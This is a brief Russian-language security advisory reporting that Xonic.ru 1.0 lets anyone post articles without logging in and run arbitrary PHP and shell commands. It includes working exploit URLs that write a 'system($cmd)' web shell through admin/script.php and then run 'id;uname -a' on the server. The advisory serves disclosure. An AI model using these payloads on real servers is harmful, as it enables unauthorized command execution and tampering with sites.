DWC Gr0up сообщил об уязвимости в Xonic.ru. Удаленный пользователь может добавлять статьи и выполнять произвольные команды на сервере.
Удаленный пользователь может добавить статьи без предварительной авторизации, используя следующий URL:
http://[target]/admin/script.php?data=ENTER_THIS_YOUR_NEWS.
Также удаленный пользователь может выполнить произвольный PHP код, включая команды оболочки, на целевом сервере:
http://[target]/admin/script.php?data=script.php?data=<? system($cmd) ?>
http://[target]/index.php?cmd=id;uname -a;
Уязвимость обнаружена в Xonic.ru 1.0.